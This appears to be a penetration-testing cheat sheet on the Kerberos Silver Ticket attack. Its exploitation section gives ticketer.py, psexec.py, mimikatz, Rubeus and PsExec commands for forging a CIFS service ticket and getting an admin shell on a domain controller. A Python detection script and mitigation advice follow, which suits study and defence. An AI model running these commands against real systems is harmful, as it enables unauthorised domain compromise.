Silver Ticket

Overview

The Silver Ticket attack consists of forging a valid TGS (service ticket) for a service once the NTLM hash of the account running that service is known (for example, the hash of a computer account). With that hash it is possible to gain access to the service by forging a custom TGS as any user, without ever contacting the KDC. In this case, the NTLM hash of a computer account (which is essentially a user account in AD) is known, so a ticket can be crafted to get into that machine with administrator privileges through the SMB service. Computer accounts reset their passwords every 30 days by default, so a stolen computer account hash has a limited lifetime unless the rotation is disabled.

Tools needed

Exploitation

Remote

# Get the ccache file
python ticketer.py -nthash <nthash> -domain-sid <sid> -domain domain.local -spn cifs/dc.domain.local <user>

# Set environment variable
export KRB5CCNAME=user.ccache

# Get shell
python psexec.py domain.local/user@dc.domain.local -k -no-pass

Local

# Create the ticket
mimikatz.exe "kerberos::golden /domain:domain.local /sid:<sid> /rc4:<hash> /user:<user> /service:cifs /target:dc.domain.local"

# Inject in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt ticket.kirbi"
.\Rubeus.exe ptt /ticket:ticket.kirbi

# Get a shell
.\PsExec.exe -accepteula \\dc.domain.local cmd
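As a defensive counterpart (an added example, not part of the original page): a forged service ticket is never issued by the KDC, so the target host records a Kerberos network logon (event 4624) for which no DC holds a matching service ticket request (event 4769). The script below correlates constructed sample events of both kinds and flags the unmatched logon; the NetBIOS name DOMAIN used by the secondary heuristic is an assumption.

```python
from datetime import datetime, timedelta

# Constructed sample events modelled on Windows Security log fields
# (4769 on the DC, 4624 logon type 3 on the target). Not real logs.
DC_TGS_EVENTS = [
    {"time": datetime(2024, 5, 1, 9, 0, 5), "user": "alice",
     "service": "cifs/dc.domain.local"},
]
HOST_LOGON_EVENTS = [
    # legitimate: Kerberos logon seconds after the DC issued the TGS
    {"time": datetime(2024, 5, 1, 9, 0, 12), "user": "alice",
     "target": "dc.domain.local", "auth_pkg": "Kerberos", "domain": "DOMAIN"},
    # suspicious: Kerberos logon although the KDC never issued a TGS
    {"time": datetime(2024, 5, 1, 9, 30, 0), "user": "administrator",
     "target": "dc.domain.local", "auth_pkg": "Kerberos",
     "domain": "domain.local"},
    # NTLM logon: outside the scope of this check
    {"time": datetime(2024, 5, 1, 9, 31, 0), "user": "bob",
     "target": "dc.domain.local", "auth_pkg": "NTLM", "domain": "DOMAIN"},
]


def logons_without_tgs(logons, tgs_events, window=timedelta(minutes=10)):
    """Return Kerberos network logons on a host for which the DC issued no
    cifs/<host> service ticket to that user within `window` beforehand.
    A silver ticket is built offline from the service account hash, so it
    produces a 4624 on the target with no preceding 4769 on any DC."""
    hits = []
    for lg in logons:
        if lg["auth_pkg"] != "Kerberos":
            continue
        spn = f"cifs/{lg['target']}".lower()
        matched = any(
            t["user"].lower() == lg["user"].lower()
            and t["service"].lower() == spn
            and timedelta(0) <= lg["time"] - t["time"] <= window
            for t in tgs_events
        )
        if not matched:
            hits.append(lg)
    return hits


def odd_domain_field(logon, netbios="DOMAIN"):
    """Secondary heuristic: logons from forged tickets often carry the
    domain exactly as typed into the forging tool (e.g. 'domain.local'),
    while logons from KDC-issued tickets show the NetBIOS name ('DOMAIN').
    The expected NetBIOS name is an assumption for this example."""
    return logon["domain"] != netbios
```

Run on real data, the same correlation needs 4769 events from every DC in the domain, and mitigation is rotating the exposed computer account password (the 30-day default is the ceiling, not a guarantee) and enabling PAC validation on the target.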
